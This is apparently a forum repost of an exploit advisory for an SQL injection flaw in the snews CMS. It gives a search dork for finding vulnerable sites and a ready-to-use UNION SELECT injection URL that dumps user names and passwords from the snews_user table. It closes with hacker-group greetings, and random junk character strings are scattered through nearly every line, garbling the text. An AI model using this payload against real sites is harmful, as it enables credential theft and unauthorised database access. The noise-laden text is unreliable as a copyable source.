标题: CMS snews SQL Injection Vulnerability
% g5 v- X8 ~4 J9 i1 m作者: By onestree# d' X1 m& o6 b. e
下载地址 : http://snewscms.com/* m8 w! I3 E" p" `) \
测试平台 : ubuntu 12.10 / win 70 M) C5 P$ z5 S7 T" I
关键词: inurl:"tanyakan pada rumput yang bergoyang"
- H' U- b$ f6 F' `3 c
# p& F. y; D% K# \! f0 J
@& W2 J5 u2 e! S4 I*************************************************************
) y m3 z% K/ c: p 9 J# E! Q# q0 g4 N2 ?, c$ `
SQL poc:
3 m+ F' A) \# H5 u' h% N " F$ T1 @. P7 L% T
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
: o7 U0 L- b9 I. e& Q " R" l# t* d' Z
示例" L6 _ ^, \5 R+ ?* e
7 Z5 T% h8 Q5 G+ F
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*' a3 g+ Z$ k0 V9 k/ ?5 Q! A5 A
; v/ b3 J( {+ S5 U1 F9 Y t: D) F
3 k& V) ]! f) r E9 q" x$ _! _% Z. Z/ W致谢:# K0 \6 f; ?2 \0 ^+ m( N
; ~4 V) n- H$ x2 T1 ~. K2 [ Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
: f& B) t+ {) E- e6 a
! @% l' l& {. J indonesiancoder - moeslimh4x0r - go-coder
2 T/ L8 B9 Q2 l6 r5 C * D' a9 r7 u7 S: A8 L& H4 i3 ?) u
spesial my hunny :*
; g. W: ~; G& B4 A6 N |
发表于 2013-1-23 08:55:06
收藏
支持
反对